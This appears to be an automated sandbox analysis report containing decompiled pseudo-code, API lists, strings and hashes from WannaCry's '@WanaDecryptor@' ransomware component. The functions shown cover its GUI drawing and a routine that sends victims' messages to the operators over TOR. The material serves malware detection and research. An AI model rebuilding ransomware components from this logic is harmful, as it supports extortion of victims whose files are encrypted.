                                  									 *((intOrPtr*)(_t443 + 0x38)) =  *((intOrPtr*)(_t283 + 8));
                                  									 *((intOrPtr*)(_t443 + 0x3c)) =  *((intOrPtr*)(_t283 + 0xc));
                                  									 *((intOrPtr*)(_t443 + 0x30)) =  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec)) + 8));
                                  									 *((intOrPtr*)( *_t429 + 0xcc))(_t321, _t443 + 0x34, _t443 + 0x1c, _t443 + 0x48);
                                  								}
                                  								if( *_t440 >=  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec))))) {
                                  									L39:
                                  									 *((intOrPtr*)( *_t433 + 0x40))(_t443 + 0x20,  *(_t443 + 0x1c),  *(_t443 + 0x20));
                                  									 *(_t443 + 0xdc) = 9;
                                  									L00412CC2();
                                  									 *(_t443 + 0x78) = 0x416770;
                                  									_t269 =  *(_t443 + 0x74);
                                  									 *(_t443 + 0xdc) = 0xb;
                                  									if(_t269 != 0xffffffff) {
                                  										_push(_t269);
                                  										L00413004();
                                  									}
                                  									 *(_t443 + 0x84) = 0x416774;
                                  									_t270 =  *(_t443 + 0x70);
                                  									 *(_t443 + 0xdc) = 0xc;
                                  									if(_t270 != 0) {
                                  										_push(_t270);
                                  										L00412DC4();
                                  									}
                                  									 *(_t443 + 0x64) = 0x416778;
                                  									_t271 =  *(_t443 + 0x6c);
                                  									 *(_t443 + 0xdc) = 0xd;
                                  									if(_t271 != 0xffffffff) {
                                  										 *((intOrPtr*)( *_t433 + 0x38))(_t271);
                                  									}
                                  									 *(_t443 + 0x50) = 0x41677c;
                                  									_t272 =  *(_t443 + 0x60);
                                  									 *(_t443 + 0xdc) = 0xf;
                                  									if(_t272 != 0) {
                                  										 *((intOrPtr*)( *( *(_t443 + 0x54)) + 0x30))(_t272);
                                  									}
                                  									 *(_t443 + 0x60) = 0;
                                  									L00412D52();
                                  									_t226 = _t443 + 0x58;
                                  									 *(_t443 + 0x58) = 0x415c00;
                                  									 *(_t443 + 0x70) = _t226;
                                  									 *(_t443 + 0xdc) = 0x10;
                                  									L00412D52();
                                  									 *(_t443 + 0x58) = 0x415bec;
                                  									 *(_t443 + 0x50) = 0x416794;
                                  									goto L48;
                                  								} else {
                                  									_t276 =  *((intOrPtr*)( *_t433 + 0x38))( *((intOrPtr*)(_t429 + 0x64)));
                                  									if( *(_t443 + 0x6c) == 0xffffffff) {
                                  										 *(_t443 + 0x6c) = _t276;
                                  									}
                                  									 *((intOrPtr*)(_t443 + 0x34)) =  *((intOrPtr*)(_t440 + 4));
                                  									 *((intOrPtr*)(_t443 + 0x38)) =  *((intOrPtr*)(_t440 + 8));
                                  									 *((intOrPtr*)(_t443 + 0x30)) =  *_t440;
                                  									 *((intOrPtr*)(_t443 + 0x38)) =  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec))));
                                  									 *((intOrPtr*)(_t443 + 0x3c)) =  *((intOrPtr*)(_t440 + 0xc));
                                  									_t279 =  *_t429;
                                  									_push(_t443 + 0x48);
                                  									_push(_t443 + 0x18);
                                  									_t361 = _t443 + 0x38;
                                  									L38:
                                  									 *((intOrPtr*)(_t279 + 0xcc))(_t321, _t361);
                                  									goto L39;
                                  								}
                                  							}
                                  							 *((intOrPtr*)( *_t429 + 0xcc))(_t321,  *((intOrPtr*)(_t443 + 0xec)), _t443 + 0x1c, _t443 + 0x48);
                                  							goto L39;
                                  						}
                                  						E00409D40(_t443 + 0x30, _t321,  *((intOrPtr*)(_t443 + 0xec)));
                                  						_t295 =  *(_t443 + 0x2c);
                                  						if( *(_t443 + 0x40) == 0) {
                                  							_t295 =  *(_t443 + 0x10);
                                  						}
                                  						if(_t295 >  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec)) + 8)) -  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec))))) {
                                  							goto L39;
                                  						} else {
                                  							asm("cdq");
                                  							_t418 =  *((intOrPtr*)(_t443 + 0x34));
                                  							 *(_t443 + 0x40) =  *_t433;
                                  							asm("cdq");
                                  							 *((intOrPtr*)( *(_t443 + 0x44) + 0x40))(_t443 + 0x98, ( *((intOrPtr*)(_t443 + 0x3c)) -  *((intOrPtr*)(_t443 + 0x30)) + _t438 - _t418 >> 1) +  *((intOrPtr*)(_t443 + 0x30)), ( *((intOrPtr*)(_t443 + 0x3c)) -  *((intOrPtr*)(_t443 + 0x34)) +  *(_t443 + 0x24) -  *(_t443 + 0x24) >> 1) + _t418);
                                  							_t279 =  *_t429;
                                  							_push(_t443 + 0x48);
                                  							_t361 =  *((intOrPtr*)(_t443 + 0xf0));
                                  							_push(_t443 + 0x18);
                                  							goto L38;
                                  						}
                                  					}
                                  				}
                                  			}

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2414#540#5875#6170#800#860$#2818#2860#3874ExtentMessageObjectPoint32SendTextViewportWindow_ftol
                                  • String ID: %d%%$gfff$pgA$pgA$tgA$tgA$xgA$xgA$|gA$|gA$[A
                                  • API String ID: 2923375784-3599407550
                                  • Opcode ID: 7e6b703d67e7595773a4bd55965276fd3caf6c6c14634650179ea244f19e8907
                                  • Instruction ID: e7c60e05cab477c723c52aa9b6021990c4bcf2d63edfa6d200c8e4e6b3644932
                                  • Opcode Fuzzy Hash: 7e6b703d67e7595773a4bd55965276fd3caf6c6c14634650179ea244f19e8907
                                  • Instruction Fuzzy Hash: D312E2B0208381DFD714CF69C484A9BBBE5BBC8304F148A2EF89997391D774E945CB66
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 72%
                                  			E00405230(void* __ecx) {
                                  				RECT* _v12;
                                  				char _v20;
                                  				char _v24;
                                  				char _v28;
                                  				char _v32;
                                  				char _v36;
                                  				char _v40;
                                  				intOrPtr _v44;
                                  				char _v48;
                                  				char _v52;
                                  				void* _v56;
                                  				void* _v60;
                                  				void* _v64;
                                  				void* _v68;
                                  				int _t98;
                                  				int _t99;
                                  				int _t104;
                                  				char* _t106;
                                  				void* _t109;
                                  				char* _t110;
                                  				signed int _t113;
                                  				int _t114;
                                  				void* _t117;
                                  				char* _t118;
                                  				char _t119;
                                  				char* _t120;
                                  				signed int _t122;
                                  				void* _t123;
                                  				int _t126;
                                  				int _t127;
                                  				int _t130;
                                  				void* _t132;
                                  				signed int _t136;
                                  				signed int _t142;
                                  				intOrPtr _t163;
                                  				intOrPtr _t179;
                                  				signed int _t182;
                                  				signed int _t198;
                                  				void* _t199;
                                  				signed int _t200;
                                  				void* _t201;
                                  				intOrPtr* _t205;
                                  				void* _t208;
                                  				intOrPtr* _t212;
                                  				intOrPtr* _t213;
                                  				intOrPtr _t215;
                                  
                                  				_push(0xffffffff);
                                  				_push(E00413918);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t215;
                                  				_t208 = __ecx;
                                  				_t182 =  *(__ecx + 0x70);
                                  				if(_t182 != 1) {
                                  					if(__eflags <= 0) {
                                  						L33:
                                  						_t98 = InvalidateRect( *(_t208 + 0x20), 0, 1);
                                  						L34:
                                  						 *[fs:0x0] = _v12;
                                  						return _t98;
                                  					}
                                  					__eflags =  *((char*)(__ecx + 0x4b)) - 1;
                                  					if( *((char*)(__ecx + 0x4b)) != 1) {
                                  						L15:
                                  						_t99 =  *(_t208 + 0x78);
                                  						__eflags = _t99 - 3;
                                  						if(_t99 != 3) {
                                  							__eflags = _t99 - 2;
                                  							if(_t99 != 2) {
                                  								__eflags = _t99;
                                  								if(_t99 != 0) {
                                  									__eflags = _t99 - 1;
                                  									if(_t99 != 1) {
                                  										goto L33;
                                  									}
                                  									_t212 = _t208 + 0x44;
                                  									_t198 =  *( *((intOrPtr*)(_t208 + 0x44)) - 8);
                                  									_t136 =  *(_t208 + 0x74);
                                  									asm("cdq");
                                  									_t98 = _t198 / _t136;
                                  									__eflags = _t98;
                                  									if(_t98 == 0) {
                                  										goto L34;
                                  									}
                                  									__eflags = _t198 - _t136;
                                  									if(_t198 < _t136) {
                                  										goto L34;
                                  									}
                                  									_t199 = 0;
                                  									__eflags = _t98;
                                  									if(_t98 <= 0) {
                                  										goto L33;
                                  									}
                                  									_t126 = _t98;
                                  									do {
                                  										_push( *((intOrPtr*)(_t136 + _t199 +  *_t212 - 1)));
                                  										_push(_t199);
                                  										L00412E12();
                                  										_push(1);
                                  										_push( *(_t208 + 0x74) + _t199);
                                  										L00412E0C();
                                  										_t136 =  *(_t208 + 0x74);
                                  										_t199 = _t199 + _t136;
                                  										_t126 = _t126 - 1;
                                  										__eflags = _t126;
                                  									} while (_t126 != 0);
                                  									goto L33;
                                  								}
                                  								_t213 = _t208 + 0x44;
                                  								_t142 =  *(_t208 + 0x74);
                                  								_t200 =  *( *((intOrPtr*)(_t208 + 0x44)) - 8);
                                  								asm("cdq");
                                  								_t104 = _t200 / _t142;
                                  								__eflags = _t104;
                                  								if(_t104 == 0) {
                                  									L22:
                                  									_t104 = 1;
                                  									L23:
                                  									_t201 = 0;
                                  									__eflags = _t104;
                                  									if(_t104 <= 0) {
                                  										goto L33;
                                  									}
                                  									_t127 = _t104;
                                  									do {
                                  										_push( *((intOrPtr*)(_t201 +  *_t213)));
                                  										_push(_t142 + _t201);
                                  										L00412E12();
                                  										_push(1);
                                  										_push(_t201);
                                  										L00412E0C();
                                  										_t142 =  *(_t208 + 0x74);
                                  										_t201 = _t201 + _t142;
                                  										_t127 = _t127 - 1;
                                  										__eflags = _t127;
                                  									} while (_t127 != 0);
                                  									goto L33;
                                  								}
                                  								__eflags = _t200 - _t142;
                                  								if(_t200 >= _t142) {
                                  									goto L23;
                                  								}
                                  								goto L22;
                                  							}
                                  							_t106 =  &_v32;
                                  							_push( *(_t208 + 0x74));
                                  							_push(_t106);
                                  							L00412E24();
                                  							_push( *(_t208 + 0x74));
                                  							_push( &_v24);
                                  							_v12 = 8;
                                  							L00412E30();
                                  							_push( &_v48);
                                  							_push(_t106);
                                  							_push( &_v36);
                                  							_v20 = 9;
                                  							L00412E18();
                                  							_push(_t106);
                                  							_v32 = 0xa;
                                  							L00412D9A();
                                  							_v36 = 9;
                                  							L00412CC2();
                                  							_v36 = 8;
                                  							L00412CC2();
                                  							_v36 = 0xffffffff;
                                  							L00412CC2();
                                  							goto L33;
                                  						}
                                  						_push( *(_t208 + 0x74));
                                  						_push( &_v36);
                                  						L00412E1E();
                                  						_v12 = 5;
                                  						_t109 =  *( *((intOrPtr*)(_t208 + 0x44)) - 8) -  *(_t208 + 0x74);
                                  						_push(_t109);
                                  						_push( &_v36);
                                  						L00412E24();
                                  						_push(_t109);
                                  						_t110 =  &_v52;
                                  						_push(_t110);
                                  						_push( &_v40);
                                  						_v20 = 6;
                                  						L00412E18();
                                  						_push(_t110);
                                  						_v32 = 7;
                                  						L00412D9A();
                                  						_v36 = 6;
                                  						L00412CC2();
                                  						_v36 = 5;
                                  						L00412CC2();
                                  						_v36 = 0xffffffff;
                                  						L00412CC2();
                                  						goto L33;
                                  					}
                                  					_t163 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x44)) - 8));
                                  					_t113 =  *(__ecx + 0x74) * _t182;
                                  					__eflags = _t163 - _t113;
                                  					if(_t163 >= _t113) {
                                  						goto L15;
                                  					}
                                  					_t114 = _t113 - _t163;
                                  					__eflags = _t114;
                                  					if(_t114 <= 0) {
                                  						goto L15;
                                  					}
                                  					_t130 = _t114;
                                  					do {
                                  						_push( *((intOrPtr*)(__ecx + 0x40)));
                                  						L00412E36();
                                  						_t130 = _t130 - 1;
                                  						__eflags = _t130;
                                  					} while (_t130 != 0);
                                  					goto L15;
                                  				}
                                  				if( *((intOrPtr*)(__ecx + 0x4b)) != _t182) {
                                  					L6:
                                  					_t205 = _t208 + 0x44;
                                  					if( *(_t208 + 0x78) != 0) {
                                  						_t117 =  *((intOrPtr*)( *_t205 - 8)) - 1;
                                  						_push(_t117);
                                  						_push( &_v36);
                                  						L00412E24();
                                  						_t118 =  &_v36;
                                  						_push(1);
                                  						_push(_t118);
                                  						_v12 = 2;
                                  						L00412E1E();
                                  						_push(_t117);
                                  						_push(_t118);
                                  						_push( &_v40);
                                  						_v20 = 3;
                                  						L00412E18();
                                  						_push(_t118);
                                  						_v32 = 4;
                                  						L00412D9A();
                                  						_v36 = 3;
                                  						L00412CC2();
                                  						_v36 = 2;
                                  						L00412CC2();
                                  						_v36 = 0xffffffff;
                                  						L00412CC2();
                                  					} else {
                                  						_push(1);
                                  						_push( &_v24);
                                  						_t119 =  *((intOrPtr*)( *_t205));
                                  						_v36 = _t119;
                                  						L00412E30();
                                  						_v12 = 0;
                                  						_push(_v44);
                                  						_push(_t119);
                                  						_t120 =  &_v36;
                                  						_push(_t120);
                                  						L00412E2A();
                                  						_push(_t120);
                                  						_v24 = 1;
                                  						L00412D9A();
                                  						_v28 = 0;
                                  						L00412CC2();
                                  						_v28 = 0xffffffff;
                                  						L00412CC2();
                                  					}
                                  					goto L33;
                                  				}
                                  				_t179 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x44)) - 8));
                                  				_t122 =  *(__ecx + 0x74);
                                  				if(_t179 >= _t122) {
                                  					goto L6;
                                  				}
                                  				_t123 = _t122 - _t179;
                                  				if(_t123 <= 0) {
                                  					goto L6;
                                  				}
                                  				_t132 = _t123;
                                  				do {
                                  					_push( *((intOrPtr*)(__ecx + 0x40)));
                                  					L00412E36();
                                  					_t132 = _t132 - 1;
                                  				} while (_t132 != 0);
                                  				goto L6;
                                  			}

                                  APIs
                                  • #940.MFC42(?), ref: 0040527D
                                  • #4277.MFC42(?,00000001), ref: 004052A0
                                  • #923.MFC42(?,00000000,?), ref: 004052B8
                                  • #858.MFC42(00000000,?,00000000,?), ref: 004052C5
                                  • #800.MFC42(00000000,?,00000000,?), ref: 004052D3
                                  • #800.MFC42(00000000,?,00000000,?), ref: 004052E4
                                  • #4129.MFC42(?,?), ref: 004052FC
                                  • #5710.MFC42 ref: 00405314
                                  • #922.MFC42(?,00000000,00000000), ref: 00405326
                                  • #858.MFC42(00000000,?,00000000,00000000), ref: 00405333
                                  • #800.MFC42(00000000,?,00000000,00000000), ref: 00405340
                                  • #800.MFC42(00000000,?,00000000,00000000), ref: 0040534E
                                  • #800.MFC42(00000000,?,00000000,00000000), ref: 0040535F
                                  • #940.MFC42(?), ref: 00405396
                                  • #5710.MFC42(?,?), ref: 004053B8
                                  • #4129.MFC42(?,?,?,?), ref: 004053D7
                                  • #922.MFC42(?,?,00000000,?,?,?,?), ref: 004053ED
                                  • #858.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 004053FA
                                  • #800.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 00405407
                                  • #800.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 00405415
                                  • #800.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 00405426
                                  • #4129.MFC42(?,?), ref: 00405443
                                  • #4277.MFC42(?,?,?,?), ref: 0040545B
                                  • #922.MFC42(?,00000000,?,?,?,?,?), ref: 00405471
                                  • #858.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 0040547E
                                  • #800.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 0040548B
                                  • #800.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 00405499
                                  • #800.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 004054AA
                                  • #6778.MFC42(?,00000001), ref: 004054EA
                                  • #6648.MFC42(00000000,00000001,?,00000001), ref: 004054F4
                                  • #6778.MFC42(00000000,?), ref: 00405536
                                  • #6648.MFC42(?,00000001,00000000,?), ref: 00405545
                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 0040555A
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #800$#858$#4129#922$#4277#5710#6648#6778#940$#923InvalidateRect
                                  • String ID:
                                  • API String ID: 2121400562-0
                                  • Opcode ID: b4a9873a0028e0a5de6b54efbba54189251206de77b36b87668466cc29092242
                                  • Instruction ID: 4ea7c19ebb0ecad4eacefd8b4ebc091e45acf9db756171f3a68d6c32b1a6cadd
                                  • Opcode Fuzzy Hash: b4a9873a0028e0a5de6b54efbba54189251206de77b36b87668466cc29092242
                                  • Instruction Fuzzy Hash: A4A1B770204B81AFC714DB29C590A6FB7E6EFD4304F040A1EF596D3391D7B8E8558B66
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 56%
                                  			E004082C0(void* __ecx) {
                                  				void* __ebp;
                                  				signed int _t44;
                                  				void* _t45;
                                  				void* _t47;
                                  				signed int _t48;
                                  				signed int _t51;
                                  				signed int _t56;
                                  				signed int _t58;
                                  				signed int _t59;
                                  				void* _t60;
                                  				signed int _t65;
                                  				signed int _t90;
                                  				signed int _t91;
                                  				signed int _t104;
                                  				intOrPtr* _t106;
                                  				struct _IO_FILE* _t107;
                                  				signed int _t108;
                                  				void* _t111;
                                  				intOrPtr _t114;
                                  				void* _t115;
                                  				void* _t116;
                                  				void* _t118;
                                  				void* _t120;
                                  
                                  				_push(0xffffffff);
                                  				_push(E00413FCE);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t114;
                                  				_t115 = _t114 - 0x8c;
                                  				_t111 = __ecx;
                                  				 *((intOrPtr*)(_t115 + 0xa4)) = 0;
                                  				_t44 =  *( *((intOrPtr*)(_t115 + 0xac)) - 8);
                                  				if(_t44 > 0x3e8) {
                                  					_push(0x3e8);
                                  					_push(0);
                                  					_push(_t115 + 0x14);
                                  					L00412F6E();
                                  					_push(_t44);
                                  					 *((char*)(_t115 + 0xa8)) = 1;
                                  					L00412D9A();
                                  					 *((char*)(_t115 + 0xa4)) = 0;
                                  					L00412CC2();
                                  				}
                                  				if( *( *((intOrPtr*)(_t115 + 0xac)) - 8) >= 0xa) {
                                  					_t106 = __imp__time;
                                  					_t45 =  *_t106(0);
                                  					_t90 =  *0x4218a8; // 0x0
                                  					_t116 = _t115 + 4;
                                  					__eflags = _t45 - _t90 - 0xb4;
                                  					if(_t45 - _t90 >= 0xb4) {
                                  						L13:
                                  						_t47 =  *_t106(0);
                                  						_t91 =  *0x4218a8; // 0x0
                                  						_t116 = _t116 + 4;
                                  						_t48 = _t47 - _t91;
                                  						__eflags = _t48 - 0xe10;
                                  						if(_t48 <= 0xe10) {
                                  							L9:
                                  							__eflags =  *0x4218ac - 3; // 0x0
                                  							if(__eflags < 0) {
                                  								L15:
                                  								 *((intOrPtr*)(_t116 + 0x14)) = 0;
                                  								memset(_t116 + 0x18, 0, 0x21 << 2);
                                  								_t51 = fopen("00000000.res", "rb");
                                  								_t107 = _t51;
                                  								_t118 = _t116 + 0x14;
                                  								__eflags = _t107;
                                  								if(_t107 != 0) {
                                  									fread(_t118 + 0x1c, 0x88, 1, _t107);
                                  									fclose(_t107);
                                  									E0040BE90("s.wnry", _t111 + 0x6ea, _t111 + 0x74e);
                                  									_push(0);
                                  									_push( *((intOrPtr*)(_t118 + 0xcc)));
                                  									_push(_t118 + 0x38);
                                  									_push(_t111 + 0x5f0);
                                  									_t56 = E0040C060( *((intOrPtr*)(_t118 + 0xcc)), __eflags);
                                  									_t118 = _t118 + 0x30;
                                  									_t108 = _t56;
                                  									E0040C670();
                                  									_t58 =  *(_t118 + 0xb0);
                                  									__eflags = _t108;
                                  									if(_t108 < 0) {
                                  										__eflags = _t58;
                                  										if(_t58 != 0) {
                                  											_push(0);
                                  											_push(0x30);
                                  											_push("Failed to send your message!\nPlease make sure that your computer is connected to the Internet and \nyour Internet Service Provider (ISP) does not block connections to the TOR Network!");
                                  											L00412CC8();
                                  										}
                                  									} else {
                                  										__eflags = _t58;
                                  										if(_t58 != 0) {
                                  											L00412CC8();
                                  											__imp__time(0, "Your message has been sent successfully!", 0x40, 0);
                                  											_t118 = _t118 + 4;
                                  											 *0x4218a8 = _t58;
                                  										}
                                  									}
                                  									 *((intOrPtr*)(_t118 + 0xa4)) = 0xffffffff;
                                  									L00412CC2();
                                  									_t59 = _t108;
                                  								} else {
                                  									 *((intOrPtr*)(_t118 + 0xa4)) = 0xffffffff;
                                  									L00412CC2();
                                  									_t59 = _t51 | 0xffffffff;
                                  								}
                                  								L23:
                                  								 *[fs:0x0] =  *((intOrPtr*)(_t118 + 0x9c));
                                  								return _t59;
                                  							}
                                  							__eflags =  *(_t116 + 0xb0);
                                  							if( *(_t116 + 0xb0) != 0) {
                                  								L00412DA6();
                                  								 *((char*)(_t116 + 0xa8)) = 2;
                                  								_t60 =  *_t106(0);
                                  								_t104 =  *0x4218a8; // 0x0
                                  								_t120 = _t116 + 4;
                                  								__eflags = 0x3d;
                                  								_push(0x3d - ((0x88888889 * (_t60 - _t104) >> 0x20) + _t60 - _t104 >> 5) + ((0x88888889 * (_t60 - _t104) >> 0x20) + _t60 - _t104 >> 5 >> 0x1f));
                                  								_push("You are sending too many mails! Please try again %d minutes later.");
                                  								_push(_t120 + 0x10);
                                  								L00412E00();
                                  								_t48 =  *(_t120 + 0x1c);
                                  								_t116 = _t120 + 0xc;
                                  								_push(0);
                                  								_push(0);
                                  								_push(_t48);
                                  								L00412CC8();
                                  								 *((char*)(_t116 + 0xa4)) = 0;
                                  								L00412CC2();
                                  							}
                                  							 *((intOrPtr*)(_t116 + 0xa4)) = 0xffffffff;
                                  							L00412CC2();
                                  							_t59 = _t48 | 0xffffffff;
                                  							goto L23;
                                  						}
                                  						 *0x4218ac = 0;
                                  						goto L15;
                                  					}
                                  					_t65 =  *0x4218ac; // 0x0
                                  					__eflags = _t65 - 3;
                                  					if(_t65 >= 3) {
                                  						goto L13;
                                  					}
                                  					_t48 = _t65 + 1;
                                  					__eflags = _t48;
                                  					 *0x4218ac = _t48;
                                  					goto L9;
                                  				}
                                  				if( *((intOrPtr*)(_t115 + 0xb0)) != 0) {
                                  					_push(0);
                                  					_push(0);
                                  					_push("Too short message!");
                                  					L00412CC8();
                                  				}
                                  				 *((intOrPtr*)(_t115 + 0xa4)) = 0xffffffff;
                                  				L00412CC2();
                                  				_t59 = _t44 | 0xffffffff;
                                  				goto L23;
                                  			}



























                                  APIs
                                  • #4278.MFC42(000003E8,00000000,000003E8,?,?,75F15C80), ref: 0040830D
                                  • #858.MFC42 ref: 00408322
                                  • #800.MFC42 ref: 00408332
                                  • #1200.MFC42(Too short message!,00000000,00000000,?,?,75F15C80), ref: 00408354
                                  • #800.MFC42 ref: 0040836B
                                  • time.MSVCRT ref: 0040837F
                                  • #540.MFC42 ref: 004083C8
                                  • time.MSVCRT ref: 004083D6
                                  • #2818.MFC42(?,You are sending too many mails! Please try again %d minutes later.,0000003D,00000000), ref: 0040840A
                                  • #1200.MFC42(?,00000000,00000000,?,?,?,00000000), ref: 00408419
                                  • #800.MFC42(?,00000000,00000000,?,?,?,00000000), ref: 00408429
                                  • #800.MFC42 ref: 00408440
                                  • time.MSVCRT ref: 0040844E
                                  • fopen.MSVCRT ref: 00408487
                                  • #800.MFC42 ref: 004084A8
                                  • fread.MSVCRT ref: 004084C2
                                  • fclose.MSVCRT ref: 004084C9
                                  • #1200.MFC42(Your message has been sent successfully!,00000040,00000000), ref: 00408522
                                  • time.MSVCRT ref: 00408528
                                  • #1200.MFC42(Failed to send your message!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!,00000030,00000000), ref: 00408544
                                  • #800.MFC42 ref: 0040855B
                                  Strings
                                  • Failed to send your message!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!, xrefs: 0040853F
                                  • 00000000.res, xrefs: 00408480
                                  • Too short message!, xrefs: 0040834F
                                  • You are sending too many mails! Please try again %d minutes later., xrefs: 00408404
                                  • Your message has been sent successfully!, xrefs: 0040851D
                                  • s.wnry, xrefs: 004084DD
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #800$#1200time$#2818#4278#540#858fclosefopenfread
                                  • String ID: 00000000.res$Failed to send your message!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!$Too short message!$You are sending too many mails! Please try again %d minutes later.$Your message has been sent successfully!$s.wnry
                                  • API String ID: 1233543560-382338106
                                  • Opcode ID: 6aef2977620d67d742a0f30d3b6c329b2d4c4f80cce0edf1bcad665571c82898
                                  • Instruction ID: 9ef4e74ff6f5855000ff98dc085b89da37e67c7abdef0d08bf307c22ead08a72
                                  • Opcode Fuzzy Hash: 6aef2977620d67d742a0f30d3b6c329b2d4c4f80cce0edf1bcad665571c82898
                                  • Instruction Fuzzy Hash: D6610371604340EFD330EB28DD81BEFB795AB90324F444A3EF199932D0DB78594586AB
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 79%
                                  			E004086E0(intOrPtr* __ecx, void* __ebp, signed long long __fp0) {
                                  				struct HBRUSH__* _v8;
                                  				char _v16;
                                  				char _v28;
                                  				intOrPtr _v36;
                                  				char _v52;
                                  				char _v76;
                                  				char _v88;
                                  				intOrPtr _v120;
                                  				intOrPtr _v124;
                                  				struct HDC__* _v128;
                                  				signed int _v132;
                                  				void* _v136;
                                  				char _v144;
                                  				signed int _v148;
                                  				struct HBRUSH__* _v152;
                                  				intOrPtr _v156;
                                  				struct HBRUSH__* _v160;
                                  				char _v164;
                                  				void* _v168;
                                  				long _v172;
                                  				char _v176;
                                  				char _v180;
                                  				struct tagRECT _v196;
                                  				intOrPtr _v200;
                                  				char* _v204;
                                  				signed int _v208;
                                  				signed int _v212;
                                  				char _v216;
                                  				intOrPtr _v220;
                                  				char _v224;
                                  				char _v228;
                                  				struct HBRUSH__* _v232;
                                  				intOrPtr _v236;
                                  				char _v240;
                                  				intOrPtr _v244;
                                  				intOrPtr _v248;
                                  				struct HDC__* _v252;
                                  				char _v256;
                                  				struct HBRUSH__* _v260;
                                  				struct HBRUSH__* _v264;
                                  				char _v268;
                                  				intOrPtr _v272;
                                  				intOrPtr _v276;
                                  				char _v280;
                                  				struct HBRUSH__* _v284;
                                  				struct HBRUSH__* _v288;
                                  				char _v292;
                                  				intOrPtr _v300;
                                  				char _v324;
                                  				signed int _t146;
                                  				intOrPtr _t148;
                                  				signed int _t150;
                                  				void* _t152;
                                  				intOrPtr _t155;
                                  				char _t163;
                                  				char* _t165;
                                  				RECT* _t177;
                                  				struct HBRUSH__* _t182;
                                  				intOrPtr _t206;
                                  				signed int _t276;
                                  				intOrPtr _t277;
                                  				intOrPtr* _t281;
                                  				void* _t283;
                                  				long _t284;
                                  				intOrPtr _t286;
                                  				intOrPtr _t291;
                                  				signed long long _t299;
                                  				signed long long _t301;
                                  				signed long long _t303;
                                  
                                  				_t299 = __fp0;
                                  				_t283 = __ebp;
                                  				_push(0xffffffff);
                                  				_push(E00414055);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t286;
                                  				_t281 = __ecx;
                                  				_push(__ecx);
                                  				L00412DD0();
                                  				_v8 = 0;
                                  				GetClientRect( *(__ecx + 0x20),  &(_v196.right));
                                  				_v172 = SendMessageA( *(_t281 + 0x20), 0x408, 0, 0);
                                  				_push( &_v164);
                                  				_push( &_v168);
                                  				L00412FFE();
                                  				L00412E54();
                                  				_v16 = 1;
                                  				E00407640( &_v240);
                                  				_v240 = 0x41675c;
                                  				_t206 = _v120;
                                  				_t146 = 0 | _t206 == 0x00000000;
                                  				_v16 = 2;
                                  				_v256 = 0x4166e0;
                                  				_v228 =  &_v132;
                                  				_v232 = 0;
                                  				_v208 = _t146;
                                  				if(_t146 == 0) {
